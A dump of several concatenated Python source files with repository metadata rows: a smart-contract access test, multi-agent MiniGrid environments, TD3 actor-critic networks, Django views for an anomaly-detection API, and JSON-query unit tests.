        # `is False` style used by the other test classes in this file.
        assert pg_contract.getAgent(agent) is False
        assert tx.events['RemoveAgent']['agent_address'] == agent.address

    # Normal_2
    def test_normal_2(self, PaymentGateway, users):
        admin = users['admin']
        agent = users['agent']

        # deploy
        pg_contract = admin.deploy(PaymentGateway)

        # add agent
        pg_contract.addAgent.transact(agent, {'from': admin})

        # remove agent
        tx = pg_contract.removeAgent.transact(agent, {'from': admin})

        # assertion
        assert pg_contract.getAgent(agent) is False
        assert tx.events['RemoveAgent']['agent_address'] == agent.address

    #######################################
    # Error
    #######################################

    # Error_1
    # Unauthorized
    def test_error_1(self, PaymentGateway, users):
        admin = users['admin']
        attacker = users['trader']
        agent = users['agent']

        # deploy
        pg_contract = admin.deploy(PaymentGateway)

        # add agent
        pg_contract.addAgent.transact(agent, {'from': admin})

        # removal from a non-admin account must revert
        with brownie.reverts():
            pg_contract.removeAgent.transact(agent, {'from': attacker})

        # assertion: agent is still registered
        assert pg_contract.getAgent(agent) is True
| 28.364568 | 81 | 0.571569 | 1,870 | 19,373 | 5.726203 | 0.07861 | 0.084983 | 0.097124 | 0.060702 | 0.866362 | 0.843388 | 0.826952 | 0.786515 | 0.781939 | 0.77755 | 0 | 0.009551 | 0.270428 | 19,373 | 682 | 82 | 28.406158 | 0.748054 | 0.104166 | 0 | 0.812308 | 0 | 0 | 0.054922 | 0.00296 | 0 | 0 | 0 | 0 | 0.258462 | 1 | 0.070769 | false | 0 | 0.003077 | 0 | 0.101538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fd254f32b439fb7a7e5f49b648ff413c42f19836 | 7,097 | py | Python | gym_minigrid/envs/unlockdoorgoal.py | TheNeeloy/ma-minigrid | 797228b096518d6cae0a7b45266a0209e7a3ed4e | [
"Apache-2.0"
] | null | null | null | gym_minigrid/envs/unlockdoorgoal.py | TheNeeloy/ma-minigrid | 797228b096518d6cae0a7b45266a0209e7a3ed4e | [
"Apache-2.0"
] | null | null | null | gym_minigrid/envs/unlockdoorgoal.py | TheNeeloy/ma-minigrid | 797228b096518d6cae0a7b45266a0209e7a3ed4e | [
"Apache-2.0"
] | null | null | null | from gym_minigrid.roomgrid import RoomGrid, MARoomGrid, CommMARoomGrid
from gym_minigrid.register import register
from gym_minigrid.minigrid import IDX_TO_COLOR, COLOR_NAMES, Door, Goal
class MAUnlockDoorGoal(MARoomGrid):
    """
    Colored goals are placed behind locked doors of the same color.
    Agents need to pick up their colored key and go to their respective
    goal to receive their reward. Episode ends when all agents reach
    their colored goal, or when the base environment signals done
    (e.g. the max_steps limit).
    """

    def __init__(
        self,
        seed=None,
        num_agents=2
    ):
        self.num_agents = num_agents
        super().__init__(
            room_size=3,
            num_rows=num_agents,
            max_steps=30*3**2,
            seed=seed,
        )

    def _gen_grid(self, width, height):
        super()._gen_grid(width, height)

        # One color per agent (capped by the number of available colors).
        potential_colors = [IDX_TO_COLOR[i] for i in range(min(self.num_agents, len(COLOR_NAMES)))]
        key_rows = [i for i in range(self.num_rows)]
        locked_door_rows = [i for i in range(self.num_rows)]
        self.goal_poses = {}

        # Add keys, goals, and locked doors
        for curr_color in potential_colors:
            # Key in a random (unused) row of the left column.
            curr_key_row = self._rand_elem(key_rows)
            key_rows.remove(curr_key_row)
            self.add_object(0, curr_key_row, 'key', curr_color)

            # Goal plus a matching locked door in a random row of the right column.
            curr_locked_door_row = self._rand_elem(locked_door_rows)
            locked_door_rows.remove(curr_locked_door_row)
            curr_goal, curr_goal_pos = self.add_object(2, curr_locked_door_row, 'goal', None)
            curr_goal.color = curr_color
            self.goal_poses[curr_color] = curr_goal_pos
            self.add_door(2, curr_locked_door_row, 2, color=curr_color, locked=True)

        # Remove walls so the left and middle columns form open corridors
        for j in range(1, self.num_rows):
            self.remove_wall(0, j, 3)
            self.remove_wall(1, j, 3)
        for j in range(1, self.grid.height - 1):
            self.grid.set(2, j, None)

        # Place the agents in the middle column
        self.agent_poses = []
        self.agent_dirs = []
        for _ in range(self.num_agents):
            self.place_agent(1)
        self.agent_poses = self.agent_poses[ : self.num_agents]
        self.agent_dirs = self.agent_dirs[ : self.num_agents]

        self.mission = "get to your respective colored goal"

    def step(self, action):
        obs, _, done, info = super().step(action)

        # Bug fix: the base env's `done` (e.g. max_steps truncation) was
        # previously overwritten with `done = True`; preserve it and
        # additionally finish when every agent stands on its own goal.
        rewards = []
        all_on_goal = True
        for agent_id, agent_pos in enumerate(self.agent_poses):
            goal_pos = self.goal_poses[IDX_TO_COLOR[agent_id]]
            if agent_pos[0] == goal_pos[0] and agent_pos[1] == goal_pos[1]:
                rewards.append(1)
            else:
                rewards.append(0)
                all_on_goal = False

        return obs, rewards, done or all_on_goal, info
class CommMAUnlockDoorGoal(CommMARoomGrid):
    """
    Communication variant of MAUnlockDoorGoal: colored goals behind locked
    doors of the same color. Agents pick up their colored key and go to
    their respective goal for reward. Episode ends when all agents reach
    their colored goal, or when the base environment signals done
    (e.g. the max_steps limit).
    """

    def __init__(
        self,
        seed=None,
        num_agents=2
    ):
        self.num_agents = num_agents
        super().__init__(
            room_size=3,
            num_rows=num_agents,
            max_steps=30*3**2,
            seed=seed,
        )

    def _gen_grid(self, width, height):
        super()._gen_grid(width, height)

        # One color per agent (capped by the number of available colors).
        potential_colors = [IDX_TO_COLOR[i] for i in range(min(self.num_agents, len(COLOR_NAMES)))]
        key_rows = [i for i in range(self.num_rows)]
        locked_door_rows = [i for i in range(self.num_rows)]
        self.goal_poses = {}

        # Add keys, goals, and locked doors
        for curr_color in potential_colors:
            # Key in a random (unused) row of the left column.
            curr_key_row = self._rand_elem(key_rows)
            key_rows.remove(curr_key_row)
            self.add_object(0, curr_key_row, 'key', curr_color)

            # Goal plus a matching locked door in a random row of the right column.
            curr_locked_door_row = self._rand_elem(locked_door_rows)
            locked_door_rows.remove(curr_locked_door_row)
            curr_goal, curr_goal_pos = self.add_object(2, curr_locked_door_row, 'goal', None)
            curr_goal.color = curr_color
            self.goal_poses[curr_color] = curr_goal_pos
            self.add_door(2, curr_locked_door_row, 2, color=curr_color, locked=True)

        # Remove walls so the left and middle columns form open corridors
        for j in range(1, self.num_rows):
            self.remove_wall(0, j, 3)
            self.remove_wall(1, j, 3)
        for j in range(1, self.grid.height - 1):
            self.grid.set(2, j, None)

        # Place the agents in the middle column
        self.agent_poses = []
        self.agent_dirs = []
        for _ in range(self.num_agents):
            self.place_agent(1)
        self.agent_poses = self.agent_poses[ : self.num_agents]
        self.agent_dirs = self.agent_dirs[ : self.num_agents]

        self.mission = "get to your respective colored goal"

    def step(self, action):
        obs, _, done, info = super().step(action)

        # Bug fix: the base env's `done` (e.g. max_steps truncation) was
        # previously overwritten with `done = True`; preserve it and
        # additionally finish when every agent stands on its own goal.
        rewards = []
        all_on_goal = True
        for agent_id, agent_pos in enumerate(self.agent_poses):
            goal_pos = self.goal_poses[IDX_TO_COLOR[agent_id]]
            if agent_pos[0] == goal_pos[0] and agent_pos[1] == goal_pos[1]:
                rewards.append(1)
            else:
                rewards.append(0)
                all_on_goal = False

        return obs, rewards, done or all_on_goal, info
class MAUnlockDoorGoalA1(MAUnlockDoorGoal):
    """Single-agent instantiation of MAUnlockDoorGoal."""

    def __init__(self, seed=None):
        super().__init__(num_agents=1, seed=seed)
class MAUnlockDoorGoalA2(MAUnlockDoorGoal):
    """Two-agent instantiation of MAUnlockDoorGoal."""

    def __init__(self, seed=None):
        super().__init__(num_agents=2, seed=seed)
class MAUnlockDoorGoalA3(MAUnlockDoorGoal):
    """Three-agent instantiation of MAUnlockDoorGoal."""

    def __init__(self, seed=None):
        super().__init__(num_agents=3, seed=seed)
class CommMAUnlockDoorGoalA1(CommMAUnlockDoorGoal):
    """Single-agent instantiation of CommMAUnlockDoorGoal."""

    def __init__(self, seed=None):
        super().__init__(num_agents=1, seed=seed)
class CommMAUnlockDoorGoalA2(CommMAUnlockDoorGoal):
    """Two-agent instantiation of CommMAUnlockDoorGoal."""

    def __init__(self, seed=None):
        super().__init__(num_agents=2, seed=seed)
class CommMAUnlockDoorGoalA3(CommMAUnlockDoorGoal):
    """Three-agent instantiation of CommMAUnlockDoorGoal."""

    def __init__(self, seed=None):
        super().__init__(num_agents=3, seed=seed)
# Register every environment variant with Gym; entry points live in
# gym_minigrid.envs and mirror the class names defined above.
_REGISTRATIONS = [
    ('MiniGrid-MA-UnlockDoorGoalA1-v0', 'MAUnlockDoorGoalA1'),
    ('MiniGrid-MA-UnlockDoorGoalA2-v0', 'MAUnlockDoorGoalA2'),
    ('MiniGrid-MA-UnlockDoorGoalA3-v0', 'MAUnlockDoorGoalA3'),
    ('MiniGrid-Comm-MA-UnlockDoorGoalA1-v0', 'CommMAUnlockDoorGoalA1'),
    ('MiniGrid-Comm-MA-UnlockDoorGoalA2-v0', 'CommMAUnlockDoorGoalA2'),
    ('MiniGrid-Comm-MA-UnlockDoorGoalA3-v0', 'CommMAUnlockDoorGoalA3'),
]

for _env_id, _cls_name in _REGISTRATIONS:
    register(
        id=_env_id,
        entry_point='gym_minigrid.envs:' + _cls_name
    )
| 31.127193 | 137 | 0.623221 | 925 | 7,097 | 4.483243 | 0.130811 | 0.047745 | 0.031348 | 0.028937 | 0.874849 | 0.858934 | 0.858934 | 0.858934 | 0.793827 | 0.793827 | 0 | 0.015662 | 0.280259 | 7,097 | 227 | 138 | 31.264317 | 0.796202 | 0.083697 | 0 | 0.778443 | 0 | 0 | 0.079621 | 0.066584 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071856 | false | 0 | 0.017964 | 0 | 0.149701 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b5f76d7d1b11d713914ba71fdd2cd10bd7143ce9 | 7,397 | py | Python | rl/policies/td3_actor_critic.py | osudrl/ASLIP-RL | b0992fba38c056f4e117c3b4fd1cda31be39e7d1 | [
"MIT"
] | 4 | 2021-02-03T02:44:30.000Z | 2022-01-18T15:48:22.000Z | rl/policies/td3_actor_critic.py | osudrl/ASLIP-RL | b0992fba38c056f4e117c3b4fd1cda31be39e7d1 | [
"MIT"
] | null | null | null | rl/policies/td3_actor_critic.py | osudrl/ASLIP-RL | b0992fba38c056f4e117c3b4fd1cda31be39e7d1 | [
"MIT"
] | 1 | 2022-01-19T01:26:00.000Z | 2022-01-19T01:26:00.000Z | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
def fanin_init(size, fanin=None):
    """Return a tensor of shape `size` drawn uniformly from
    [-1/sqrt(fanin), 1/sqrt(fanin)]; fanin defaults to size[0]."""
    bound = 1. / np.sqrt(fanin or size[0])
    return torch.Tensor(size).uniform_(-bound, bound)
# By default all the modules are initialized to train mode (self.training = True)
class Original_Actor(nn.Module):
    """Deterministic policy network: state -> action in [-max_action, max_action]."""

    def __init__(self, state_dim, action_dim, max_action, hidden_size1, hidden_size2, init_w=3e-3):
        super(Original_Actor, self).__init__()

        self.max_action = max_action
        self.l1 = nn.Linear(state_dim, hidden_size1)
        self.l2 = nn.Linear(hidden_size1, hidden_size2)
        self.l3 = nn.Linear(hidden_size2, action_dim)

        # Bug fix: init_w was accepted but never applied -- init_weights was
        # defined yet never called, unlike every other module in this file.
        self.init_weights(init_w)

    def init_weights(self, init_w):
        """Fan-in style uniform init for hidden layers; small uniform output layer."""
        # Self-contained equivalent of the module-level fanin_init helper:
        # uniform in [-1/sqrt(fan), 1/sqrt(fan)] with fan = weight.size(0).
        for layer in (self.l1, self.l2):
            bound = 1. / np.sqrt(layer.weight.data.size(0))
            layer.weight.data.uniform_(-bound, bound)
        self.l3.weight.data.uniform_(-init_w, init_w)

    def forward(self, x):
        """Map a batch of states to actions scaled by max_action."""
        x = F.relu(self.l1(x))
        x = F.relu(self.l2(x))
        x = self.max_action * torch.tanh(self.l3(x))
        return x
class DDPGCritic(nn.Module):
    """Single Q-network critic for DDPG: Q(state, action) -> scalar."""

    def __init__(self, state_dim, action_dim, hidden_size1, hidden_size2, init_w=3e-3):
        super(DDPGCritic, self).__init__()

        # Bug fix: the original assigned self.max_action = max_action, but no
        # max_action parameter exists -> NameError on instantiation. A critic
        # has no use for the action bound, so the line is removed.
        self.l1 = nn.Linear(state_dim + action_dim, hidden_size1)
        self.l2 = nn.Linear(hidden_size1, hidden_size2)
        self.l3 = nn.Linear(hidden_size2, 1)

        self.init_weights(init_w)

    def init_weights(self, init_w):
        """Fan-in style uniform init for hidden layers; small uniform output layer."""
        # Self-contained equivalent of the module-level fanin_init helper:
        # uniform in [-1/sqrt(fan), 1/sqrt(fan)] with fan = weight.size(0).
        for layer in (self.l1, self.l2):
            bound = 1. / np.sqrt(layer.weight.data.size(0))
            layer.weight.data.uniform_(-bound, bound)
        self.l3.weight.data.uniform_(-init_w, init_w)

    def forward(self, inputs, actions):
        """Concatenate state and action, two ReLU hidden layers, scalar Q out."""
        xu = torch.cat([inputs, actions], 1)
        x1 = F.relu(self.l1(xu))
        x1 = F.relu(self.l2(x1))
        x1 = self.l3(x1)
        return x1
class TD3Critic(nn.Module):
    """Twin Q-networks for TD3: forward returns (Q1, Q2), Q1 returns only the first."""

    def __init__(self, state_dim, action_dim, hidden_size1, hidden_size2, init_w=3e-3):
        super(TD3Critic, self).__init__()
        sa_dim = state_dim + action_dim

        # Q1 architecture
        self.l1 = nn.Linear(sa_dim, hidden_size1)
        self.l2 = nn.Linear(hidden_size1, hidden_size2)
        self.l3 = nn.Linear(hidden_size2, 1)

        # Q2 architecture
        self.l4 = nn.Linear(sa_dim, hidden_size1)
        self.l5 = nn.Linear(hidden_size1, hidden_size2)
        self.l6 = nn.Linear(hidden_size2, 1)

        # init weights for both nets
        self.init_weights(init_w)

    def init_weights(self, init_w):
        """Fan-in uniform init for hidden layers; small uniform for both heads."""
        for hidden in (self.l1, self.l2):
            hidden.weight.data = fanin_init(hidden.weight.data.size())
        self.l3.weight.data.uniform_(-init_w, init_w)
        for hidden in (self.l4, self.l5):
            hidden.weight.data = fanin_init(hidden.weight.data.size())
        self.l6.weight.data.uniform_(-init_w, init_w)

    def forward(self, inputs, actions):
        """Return both critics' values for the state/action batch."""
        sa = torch.cat([inputs, actions], 1)
        q1 = self.l3(F.relu(self.l2(F.relu(self.l1(sa)))))
        q2 = self.l6(F.relu(self.l5(F.relu(self.l4(sa)))))
        return q1, q2

    def Q1(self, inputs, actions):
        """Return only the first critic's value (used for the actor update)."""
        sa = torch.cat([inputs, actions], 1)
        return self.l3(F.relu(self.l2(F.relu(self.l1(sa)))))
# Layernorm (marked by LN) used to make correlated parameter noise possible for DDPG and TD3
class LN_Actor(nn.Module):
    """Deterministic policy network with LayerNorm after each hidden layer."""

    def __init__(self, state_dim, action_dim, max_action, hidden_size1, hidden_size2, init_w=3e-3):
        super(LN_Actor, self).__init__()

        self.max_action = max_action
        self.l1 = nn.Linear(state_dim, hidden_size1)
        self.ln1 = nn.LayerNorm(hidden_size1)
        self.l2 = nn.Linear(hidden_size1, hidden_size2)
        self.ln2 = nn.LayerNorm(hidden_size2)
        self.l3 = nn.Linear(hidden_size2, action_dim)

        self.init_weights(init_w)

    def init_weights(self, init_w):
        """Fan-in uniform init for hidden layers; small uniform output layer."""
        self.l1.weight.data = fanin_init(self.l1.weight.data.size())
        self.l2.weight.data = fanin_init(self.l2.weight.data.size())
        self.l3.weight.data.uniform_(-init_w, init_w)

    def forward(self, x):
        h = self.ln1(F.relu(self.l1(x)))
        h = self.ln2(F.relu(self.l2(h)))
        # NOTE(review): output is plain tanh in [-1, 1]; max_action is stored
        # but not applied here (the scaled form was removed upstream) --
        # confirm callers expect unscaled actions.
        return torch.tanh(self.l3(h))
class LN_DDPGCritic(nn.Module):
    """Single Q-network critic with LayerNorm (enables correlated param noise)."""

    def __init__(self, state_dim, action_dim, hidden_size1, hidden_size2, init_w=3e-3):
        super(LN_DDPGCritic, self).__init__()

        self.l1 = nn.Linear(state_dim + action_dim, hidden_size1)
        self.ln1 = nn.LayerNorm(hidden_size1)
        self.l2 = nn.Linear(hidden_size1, hidden_size2)
        self.ln2 = nn.LayerNorm(hidden_size2)
        self.l3 = nn.Linear(hidden_size2, 1)

        self.init_weights(init_w)

    def init_weights(self, init_w):
        """Fan-in uniform init for hidden layers; small uniform output layer."""
        self.l1.weight.data = fanin_init(self.l1.weight.data.size())
        self.l2.weight.data = fanin_init(self.l2.weight.data.size())
        self.l3.weight.data.uniform_(-init_w, init_w)

    def forward(self, inputs, actions):
        """Q(s, a): concat state and action, two LN'd hidden layers, scalar out."""
        sa = torch.cat([inputs, actions], 1)
        h = self.ln1(F.relu(self.l1(sa)))
        h = self.ln2(F.relu(self.l2(h)))
        return self.l3(h)
# critic uses 2 action-value functions (and uses smaller one to form targets)
class LN_TD3Critic(nn.Module):
    """Twin-head Q-network with LayerNorm after each hidden layer (TD3).

    forward() returns both estimates; Q1() returns only the first head.
    """

    def __init__(self, state_dim, action_dim, hidden_size1, hidden_size2, init_w=3e-3):
        super(LN_TD3Critic, self).__init__()
        # Q1 head
        self.l1 = nn.Linear(state_dim + action_dim, hidden_size1)
        self.ln1 = nn.LayerNorm(hidden_size1)
        self.l2 = nn.Linear(hidden_size1, hidden_size2)
        self.ln2 = nn.LayerNorm(hidden_size2)
        self.l3 = nn.Linear(hidden_size2, 1)
        # Q2 head
        self.l4 = nn.Linear(state_dim + action_dim, hidden_size1)
        self.ln4 = nn.LayerNorm(hidden_size1)
        self.l5 = nn.Linear(hidden_size1, hidden_size2)
        self.ln5 = nn.LayerNorm(hidden_size2)
        self.l6 = nn.Linear(hidden_size2, 1)
        self.init_weights(init_w)

    def init_weights(self, init_w):
        """Initialize both heads, preserving the original layer order."""
        for hidden in (self.l1, self.l2):
            hidden.weight.data = fanin_init(hidden.weight.data.size())
        self.l3.weight.data.uniform_(-init_w, init_w)
        for hidden in (self.l4, self.l5):
            hidden.weight.data = fanin_init(hidden.weight.data.size())
        self.l6.weight.data.uniform_(-init_w, init_w)

    def _head(self, sa, lin1, norm1, lin2, norm2, out):
        # Shared MLP shape for both Q heads: Linear -> ReLU -> LN, twice, then a scalar.
        h = norm1(F.relu(lin1(sa)))
        h = norm2(F.relu(lin2(h)))
        return out(h)

    def forward(self, inputs, actions):
        """Return both Q-value estimates for a batch of (state, action) pairs."""
        sa = torch.cat([inputs, actions], 1)
        q1 = self._head(sa, self.l1, self.ln1, self.l2, self.ln2, self.l3)
        q2 = self._head(sa, self.l4, self.ln4, self.l5, self.ln5, self.l6)
        return q1, q2

    def Q1(self, inputs, actions):
        """Return only the first head's estimate."""
        sa = torch.cat([inputs, actions], 1)
        return self._head(sa, self.l1, self.ln1, self.l2, self.ln2, self.l3)
| 32.585903 | 99 | 0.623361 | 1,127 | 7,397 | 3.899734 | 0.090506 | 0.091013 | 0.040956 | 0.06917 | 0.897156 | 0.888737 | 0.888737 | 0.888737 | 0.881456 | 0.87463 | 0 | 0.047738 | 0.243883 | 7,397 | 226 | 100 | 32.730089 | 0.738065 | 0.055158 | 0 | 0.822785 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.132911 | false | 0 | 0.025316 | 0 | 0.253165 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bd0d7d32fc5721eab8e25a690e6cd5f08b14a0c1 | 6,649 | py | Python | app/controller/api/views.py | wanghuaway/Metis | 58fa0dff377c97f1fe4a10d4544e50c12cd34bd6 | [
"Apache-2.0"
] | 1 | 2018-10-21T14:55:10.000Z | 2018-10-21T14:55:10.000Z | app/controller/api/views.py | wanghuaway/Metis | 58fa0dff377c97f1fe4a10d4544e50c12cd34bd6 | [
"Apache-2.0"
] | null | null | null | app/controller/api/views.py | wanghuaway/Metis | 58fa0dff377c97f1fe4a10d4544e50c12cd34bd6 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from django.shortcuts import render
from django.http import FileResponse
from common.render import render_json
from app.service.time_series_detector.anomaly_service import *
from app.service.time_series_detector.sample_service import *
from app.service.time_series_detector.task_service import *
from app.service.time_series_detector.detect_service import *
from app.config.errorcode import *
from app.utils.utils import *
def search_anomaly(request):
    """POST endpoint: query anomaly records via AnomalyService."""
    if request.method == "POST":
        try:
            anomaly_service = AnomalyService()
            return_dict = anomaly_service.query_anomaly(request.body)
        except Exception as ex:  # fixed Py2-only `except Exception, ex`
            return_dict = build_ret_data(THROW_EXP, str(ex))
        return render_json(return_dict)
    else:
        return_dict = build_ret_data(NOT_POST)
        return render_json(return_dict)
def import_sample(request):
    """POST endpoint: import uploaded sample files via SampleService."""
    if request.method == "POST":
        try:
            sample_service = SampleService()
            return_dict = sample_service.import_file(request.FILES)
        except Exception as ex:  # fixed Py2-only `except Exception, ex`
            return_dict = build_ret_data(THROW_EXP, str(ex))
        return render_json(return_dict)
    else:
        return_dict = build_ret_data(NOT_POST)
        return render_json(return_dict)
def update_sample(request):
    """POST endpoint: update a sample record via SampleService."""
    if request.method == "POST":
        try:
            sample_service = SampleService()
            return_dict = sample_service.update_sample(request.body)
        except Exception as ex:  # fixed Py2-only `except Exception, ex`
            return_dict = build_ret_data(THROW_EXP, str(ex))
        return render_json(return_dict)
    else:
        return_dict = build_ret_data(NOT_POST)
        return render_json(return_dict)
def query_sample(request):
    """POST endpoint: query sample records via SampleService."""
    if request.method == "POST":
        try:
            sample_service = SampleService()
            return_dict = sample_service.query_sample(request.body)
        except Exception as ex:  # fixed Py2-only `except Exception, ex`
            return_dict = build_ret_data(THROW_EXP, str(ex))
        return render_json(return_dict)
    else:
        return_dict = build_ret_data(NOT_POST)
        return render_json(return_dict)
def update_anomaly(request):
    """POST endpoint: update an anomaly record via AnomalyService."""
    if request.method == "POST":
        try:
            # Local renamed from `sample_service`: this is an AnomalyService.
            anomaly_service = AnomalyService()
            return_dict = anomaly_service.update_anomaly(request.body)
        except Exception as ex:  # fixed Py2-only `except Exception, ex`
            return_dict = build_ret_data(THROW_EXP, str(ex))
        return render_json(return_dict)
    else:
        return_dict = build_ret_data(NOT_POST)
        return render_json(return_dict)
def train(request):
    """POST endpoint: launch a training task; the body must be JSON."""
    if request.method == "POST":
        try:
            detect_service = DetectService()
            # json.loads failures are also reported through THROW_EXP below.
            return_dict = detect_service.process_train(json.loads(request.body))
        except Exception as ex:  # fixed Py2-only `except Exception, ex`
            return_dict = build_ret_data(THROW_EXP, str(ex))
        return render_json(return_dict)
    else:
        return_dict = build_ret_data(NOT_POST)
        return render_json(return_dict)
def download_sample(request):
    """GET endpoint: export the sample identified by ?id=... as a CSV attachment.

    The open file handle is handed to FileResponse, which streams and then
    closes it; any failure falls back to a JSON error payload.
    """
    if request.method == "GET":
        try:
            sample_service = SampleService()
            file_name = sample_service.sample_download(request.GET['id'])
            files = open(file_name, 'rb')
            response = FileResponse(files)
            response['Content-Type'] = 'application/octet-stream'
            response['Content-Disposition'] = 'attachment;filename = "SampleExport.csv"'
            return response
        except Exception as ex:  # fixed Py2-only `except Exception, ex`
            return_dict = build_ret_data(THROW_EXP, str(ex))
            return render_json(return_dict)
    else:
        return_dict = build_ret_data(NOT_GET)
        return render_json(return_dict)
def predict_rate(request):
    """POST endpoint: rate prediction; the body must be JSON."""
    if request.method == "POST":
        try:
            detect_service = DetectService()
            return_dict = detect_service.rate_predict(json.loads(request.body))
        except Exception as ex:  # fixed Py2-only `except Exception, ex`
            return_dict = build_ret_data(THROW_EXP, str(ex))
        return render_json(return_dict)
    else:
        return_dict = build_ret_data(NOT_POST)
        return render_json(return_dict)
def predict_value(request):
    """POST endpoint: value prediction; the body must be JSON."""
    if request.method == "POST":
        try:
            detect_service = DetectService()
            return_dict = detect_service.value_predict(json.loads(request.body))
        except Exception as ex:  # fixed Py2-only `except Exception, ex`
            return_dict = build_ret_data(THROW_EXP, str(ex))
        return render_json(return_dict)
    else:
        return_dict = build_ret_data(NOT_POST)
        return render_json(return_dict)
def query_train_task(request):
    """POST endpoint: list training tasks via TrainService."""
    if request.method == "POST":
        try:
            train_service = TrainService()
            return_dict = train_service.query_train(request.body)
        except Exception as ex:  # fixed Py2-only `except Exception, ex`
            return_dict = build_ret_data(THROW_EXP, str(ex))
        return render_json(return_dict)
    else:
        return_dict = build_ret_data(NOT_POST)
        return render_json(return_dict)
def query_train_source(request):
    """POST endpoint: list available sample sources (takes no request data)."""
    if request.method == "POST":
        try:
            sample_service = SampleService()
            return_dict = sample_service.query_sample_source()
        except Exception as ex:  # fixed Py2-only `except Exception, ex`
            return_dict = build_ret_data(THROW_EXP, str(ex))
        return render_json(return_dict)
    else:
        return_dict = build_ret_data(NOT_POST)
        return render_json(return_dict)
def delete_train_task(request):
    """POST endpoint: delete a training task via TrainService."""
    if request.method == "POST":
        try:
            train_service = TrainService()
            return_dict = train_service.delete_train(request.body)
        except Exception as ex:  # fixed Py2-only `except Exception, ex`
            return_dict = build_ret_data(THROW_EXP, str(ex))
        return render_json(return_dict)
    else:
        return_dict = build_ret_data(NOT_POST)
        return render_json(return_dict)
def delete_sample(request):
    """POST endpoint: delete a sample record via SampleService."""
    if request.method == "POST":
        try:
            sample_service = SampleService()
            return_dict = sample_service.delete_sample(request.body)
        except Exception as ex:  # fixed Py2-only `except Exception, ex`
            return_dict = build_ret_data(THROW_EXP, str(ex))
        return render_json(return_dict)
    else:
        return_dict = build_ret_data(NOT_POST)
        return render_json(return_dict)
def count_sample(request):
    """POST endpoint: count sample records via SampleService."""
    if request.method == "POST":
        try:
            sample_service = SampleService()
            return_dict = sample_service.count_sample(request.body)
        except Exception as ex:  # fixed Py2-only `except Exception, ex`
            return_dict = build_ret_data(THROW_EXP, str(ex))
        return render_json(return_dict)
    else:
        return_dict = build_ret_data(NOT_POST)
        return render_json(return_dict)
| 33.245 | 88 | 0.657994 | 803 | 6,649 | 5.124533 | 0.102117 | 0.167679 | 0.102066 | 0.122479 | 0.838882 | 0.823572 | 0.815796 | 0.794897 | 0.751883 | 0.751883 | 0 | 0.000203 | 0.258686 | 6,649 | 199 | 89 | 33.41206 | 0.834652 | 0.003158 | 0 | 0.717647 | 0 | 0 | 0.023242 | 0.003622 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.076471 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
95231052d68c061be7ca8d871719da5f62827c71 | 8,281 | py | Python | tests/test_ejson.py | tinybees/jsonquery | 5ff6b74c66656bcc34e7df161c6ab92cd1d9a1c7 | [
"MIT"
] | 2 | 2018-03-30T15:06:22.000Z | 2019-02-08T14:40:30.000Z | tests/test_ejson.py | tinybees/eqjson | 5ff6b74c66656bcc34e7df161c6ab92cd1d9a1c7 | [
"MIT"
] | null | null | null | tests/test_ejson.py | tinybees/eqjson | 5ff6b74c66656bcc34e7df161c6ab92cd1d9a1c7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding=utf-8
"""
@author: guoyanfeng
@software: PyCharm
@time: 2017-4-13 18:57
"""
import json
import unittest
from eqjson import EasyQueryjson
class TestEjson1(unittest.TestCase):
    """ejson unit tests, case 1: a document whose root is a JSON object."""

    @classmethod
    def setUpClass(cls):
        # One shared query object per class; method numbering orders the
        # mutating tests (106+) after the pure reads.
        with open("json_test_1.json") as f:
            json_doc = json.load(f)
        cls.ejson_obj = EasyQueryjson(json_doc)

    def test_101_get_first_tier(self, ):
        """Read a top-level scalar by key."""
        val = self.ejson_obj.get_value("id")
        self.assertEqual(val, 1123123812831823)

    def test_102_get_second_tier(self, ):
        """Read a nested value with a dotted path."""
        val = self.ejson_obj.get_value("object.name")
        self.assertEqual(val, "myLittleObject")

    def test_103_get_third_tier(self, ):
        """Index into a list with a numeric path segment."""
        val = self.ejson_obj.get_value("object.valueAsString.0")
        self.assertEqual(val, "one")

    def test_104_get_third_tier_list0_dict_value(self, ):
        """Read a key from a dict stored inside a list element."""
        val = self.ejson_obj.get_value("object.value.1.key")
        self.assertEqual(val, "value2")

    def test_105_get_list_all_key_value(self, ):
        """Omitting the index collects the key from every list element."""
        val = self.ejson_obj.get_value("object.value.key")
        self.assertEqual(val, ["value1", "value2", "value3"])

    def test_106_change_first_tier(self, ):
        """Overwrite a top-level value; the string '123456' reads back as int."""
        self.ejson_obj.change_value("id", "123456")
        val = self.ejson_obj.get_value("id")
        self.assertEqual(val, 123456)

    def test_107_change_second_tier(self, ):
        """Overwrite a nested value."""
        self.ejson_obj.change_value("object.name", "updatename")
        val = self.ejson_obj.get_value("object.name")
        self.assertEqual(val, "updatename")

    def test_108_change_list_value(self, ):
        """Replace a list element with a new list."""
        self.ejson_obj.change_value("object.value.2", ["five", "four"])
        val = self.ejson_obj.get_value("object.value.2")
